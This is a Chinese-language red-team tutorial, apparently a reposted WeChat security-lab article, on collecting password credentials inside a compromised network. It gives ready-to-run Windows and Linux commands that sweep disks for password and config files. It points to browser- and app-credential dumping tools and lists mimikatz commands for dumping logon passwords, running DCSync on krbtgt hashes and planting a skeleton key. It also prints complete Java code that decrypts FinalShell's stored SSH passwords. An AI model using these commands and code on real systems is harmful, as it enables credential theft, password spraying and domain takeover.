内网穿透之-收集内网密码凭证(红队攻防篇章二)

admin 2024年4月2日10:07:01评论6 views字数 5149阅读17分9秒阅读模式

免责声明:本篇文章仅用于技术教学,切勿进行非法测试,由于传播、利用本公众号无影安全实验室所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号无影安全实验室及作者不为此承担任何责任,一旦造成后果请自行承担!


朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把"
无影安全实验室"设为星标,这样更新文章也能第一时间推送!

内网穿透之-收集内网密码凭证(红队攻防篇章二)

安全文章

前言当我们拿下一台网络边界的服务器后,一定要进行特别细致的信息收集,其中密码凭证是重中之重,那怕花很长时间,也要尽可能的找到更多的密码凭证,为下一步的内网的密码喷洒打好坚实的基础,为了方便管理,管理员在内网配置的服务器或者不同业务板块的服务器或者其它服务,例如数据库密码都很有可能存在密码相同的情况(试想一下,当内网主机很多,到好几十台、上百台甚至上千台的时候,要求每一台服务器密码都不一致,是不太可能的,特别是服务器很多的情况下,因为对于运维管理人员来说管理起来会非常的不方便,但是方便永远是安全的敌人,因此在实战中,密码喷洒进行横向渗透的成功率也是非常高的。

一、利用命令一键收集
windows命令(保存为bat执行):

dir /a /s /b d:"*.txt" dir /a /s /b d:"*.xml" dir /a /s /b d:"*.mdb" dir /a /s /b d:"*.sql" dir /a /s /b d:"*.mdf" dir /a /s /b d:"*.eml" dir /a /s /b d:"*.pst" dir /a /s /b d:"*conf*" dir /a /s /b d:"*bak*" dir /a /s /b d:"*pwd*" dir /a /s /b d:"*pass*" dir /a /s /b d:"*login*" dir /a /s /b d:"*user*"dir /a /s /b c:password.txtdir /a /s /b c:*.conf *.ini *.inc *.config dir /a /s /b c:conf.* config.* dir /a /s /b c:*.txt *.xls *.xlsx *.docx | findstr "拓扑"dir /a /s /b c:*.conf *.ini *.inc *.config | findstr "运维"dir /a /s /b c:*.txt *.xls *.xlsx *.docx | findstr "密码" >C:Users1.txt

Linux命令:

find /tmp/ -type f|egrep -v "*.js"|egrep -v "*.css"|egrep -v "*.html"|egrep -v "*.htm"|egrep -v "*.woff"|egrep -v "*.jar"|egrep -v "*.java"|egrep -v "*.class"|egrep -v "*.properties"|egrep -v "*.MF"|egrep -v "*.tmp"|egrep -v "*.vm"|egrep -v "*.svn*"|egrep -v "*LICENSE*"|egrep -v "*.exe"|egrep -v "*.xml"|egrep -v "*.txt"|egrep -v "*.svg"|xargs egrep -s -i  "*user:|*user=|username:|username=|*pass:|*pass=|password:|password=|passwd:|passwd=|账号:|账号:|用户名:|用户名:|密码:|密码:" --color

二、常规命令进行收集

可以通过 for 循环来查找,例如查找匹配 pass ⽂件:

for /r c: %i in (pass.*,username.*) do @echo %i

查找⼀个⽂件⾥有没有 user 、 pass等字段内容,就可以使⽤这条命令:(从txt文件中查找包含了user、pass内容的文件)

findstr /c:"username" /c:"password" /si *.txt

三、抓取浏览器历史记录和密码凭证

推荐工具一:HackBrowserData(执行完毕会在当前目录下生成一个result文件夹,里面包含了各类浏览器的访问历史记录、保存的账号密码凭证以及对应的登录地址、下载的文件等等)

内网穿透之-收集内网密码凭证(红队攻防篇章二)

内网穿透之-收集内网密码凭证(红队攻防篇章二)

内网穿透之-收集内网密码凭证(红队攻防篇章二)

HackBrowserData(支持的浏览器)

内网穿透之-收集内网密码凭证(红队攻防篇章二)

推荐工具二:SharpDecryptPwd(支持抓取多种内网常用软件的密码凭证,例如Navicat、Xmanager、火狐、谷歌、向日葵等)

内网穿透之-收集内网密码凭证(红队攻防篇章二)

内网穿透之-收集内网密码凭证(红队攻防篇章二)

四、mimikatz抓取主机密码凭证

内网穿透之-收集内网密码凭证(红队攻防篇章二)

windows10 / 2012r2 之后的系统版本抓不到明文

内网穿透之-收集内网密码凭证(红队攻防篇章二)

mimikatz除了抓凭证外,其它功能也很强大,以下列举一些常用命令:

privilege::debug //提升权限

sekurlsa::logonpasswords //抓取密码

kerberos::list //列出存储票据

kerberos::purge //清空存储票据

kerberos::ptt XX.XX //导入票据

lsadump::dcsync /domain:http://test.com /all /csv //获取所有域用户

lsadump::dcsync /domain:http://test.com /user:test //指定获取某个用户的hash

lsadump::dcsync /domain:http://xx.com /user:krbtgt //获取krbtgt的用户hash

misc::skeleton //添加万能密钥

五、星号密码查看器
一些软件保存了密码,但是显示为星号,我们需要拿到其明文作为字典进行横向的时候,就可以用到星号密码查看器尝试(并不是所有软件星号密码都能抓到,没辙时候,碰碰运气

内网穿透之-收集内网密码凭证(红队攻防篇章二)

、抓取Finallshell保存的凭证

首先FinalShell是一款免费的国产的集SSH工具、服务器管理、远程桌面加速的良心软件,同时支持Windows,macOS,Linux,它不单单是一个SSH工具,完整的说法应该叫一体化的的服务器,网络管理软件,在很大程度上可以免费替代XShell,是国产中不多见的良心产品,具有免费海外服务器远程桌面加速,ssh加速,双边tcp加速等功能(个人补充:这款工具很好用,Gui界面做得很好,自己也在使用,同时这款工具很多运维人员也有安装使用,因此学会获取这个Finallshell的凭证也是非常重要的!!)

内网穿透之-收集内网密码凭证(红队攻防篇章二)

连接信息存储在
C:UsersonesevenAppDataLocalfinalshellconn目录下 有多少条连接就会有多少个xxx_connect_config.json文件(用户只要勾选了记住密码,在json中就会存在password)

内网穿透之-收集内网密码凭证(红队攻防篇章二)

内网穿透之-收集内网密码凭证(红队攻防篇章二)

利用网上别人写好的代码进行离线解密:

import java.io.ByteArrayOutputStream;import java.io.DataOutputStream;import java.io.IOException;import java.math.BigInteger;import java.security.MessageDigest;import  java.security.NoSuchAlgorithmException;import java.security.SecureRandom;import java.util.Base64;import java.util.Random;import javax.crypto.Cipher;import javax.crypto.SecretKey;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.DESKeySpec;public class FinalShellDecodePass {     public static void main(String[] args)throws Exception {         System.out.println(decodePass(args[0]));     }     public static byte[] desDecode(byte[] data, byte[] head) throws  Exception {         SecureRandom sr = new SecureRandom();         DESKeySpec dks = new DESKeySpec(head);         SecretKeyFactory keyFactory =  SecretKeyFactory.getInstance("DES");         SecretKey securekey = keyFactory.generateSecret(dks);         Cipher cipher = Cipher.getInstance("DES");         cipher.init(2, securekey, sr);         return cipher.doFinal(data);     }     public static String decodePass(String data) throws Exception {         if (data == null) {            return null;         } else {            String rs = "";            byte[] buf =  Base64.getDecoder().decode(data);            byte[] head = new byte[8];            System.arraycopy(buf, 0, head, 0,  head.length);            byte[] d = new byte[buf.length -  head.length];            System.arraycopy(buf,  head.length, d, 0, d.length);            byte[] bt = desDecode(d,  ranDomKey(head));            rs = new String(bt);            return rs;         }     }     static byte[] ranDomKey(byte[] head) {         long ks = 3680984568597093857L / (long)(new  Random((long)head[5])).nextInt(127);         Random random = new Random(ks);         int t = head[0];         for(int i = 0; i < t; ++i) {            random.nextLong();         }         long n = random.nextLong();         Random r2 = new Random(n);         long[] ld = new long[]{     (long)head[4], r2.nextLong(), (long)head[7], (long)head[3],  r2.nextLong(), (long)head[1], random.nextLong(), (long)head[2]};         ByteArrayOutputStream bos = new ByteArrayOutputStream();         DataOutputStream dos = new DataOutputStream(bos);         long[] var15 = ld;         int var14 = ld.length;         for(int var13 = 0; var13 < var14; ++var13) {            long l = var15[var13];            try {                dos.writeLong(l);            } catch (IOException var18) {                var18.printStackTrace();            }         }         try {            dos.close();         } catch (IOException var17) {            var17.printStackTrace();         }         byte[] keyData = bos.toByteArray();         keyData = md5(keyData);         return keyData;     }     public static byte[] md5(byte[] data) {         String ret = null;         byte[] res=null;         try {            MessageDigest m;            m =  MessageDigest.getInstance("MD5");            m.update(data, 0, data.length);            res=m.digest();            ret = new BigInteger(1,  res).toString(16);         } catch (NoSuchAlgorithmException e) {            e.printStackTrace();         }         return res;     }}

成功解密
内网穿透之-收集内网密码凭证(红队攻防篇章二)

交流群,欢迎大家进群畅所欲言内网穿透之-收集内网密码凭证(红队攻防篇章二)

红队攻防篇章将持续更新,感兴趣的小伙伴点个关注叭!!!

原文始发于微信公众号(无影安全实验室):内网穿透之-收集内网密码凭证(红队攻防篇章二)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月2日10:07:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网穿透之-收集内网密码凭证(红队攻防篇章二)https://cn-sec.com/archives/2622159.html

发表评论

匿名网友 填写信息